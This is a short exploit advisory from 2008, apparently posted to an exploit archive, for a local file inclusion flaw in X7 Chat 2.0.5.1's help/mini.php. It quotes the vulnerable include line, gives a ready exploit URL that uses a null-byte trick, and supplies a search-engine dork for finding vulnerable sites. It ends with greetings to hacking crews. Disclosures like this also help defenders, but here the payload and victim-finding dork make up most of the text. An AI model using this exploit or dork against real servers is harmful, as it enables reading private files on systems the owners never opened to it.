X7 Chat 2.0.5.1 (mini.php help_file) Local File Inclusion Vulnerability

2008-09-27 20:01:05

====================================================================


[o] X7 Chat 2.0.5.1 Local File Inclusion Vulnerability

Software : X7 Chat version 2.0.5.1
Vendor : http://x7chat.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com


====================================================================


[o] Vulnerable file

help/mini.php

include("./help/{$_GET['help_file']}");



[o] Exploit

http://localhost/[path]/help/mini.php?help_file=[LFI]%00



[o] Dork

"powered by x7 chat"


====================================================================


[o] Greetz

MainHack BrotherHood [ www.mainhack.com ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ k1tk4t
skulmatic olibekas ulga Cungkee str0ke


====================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.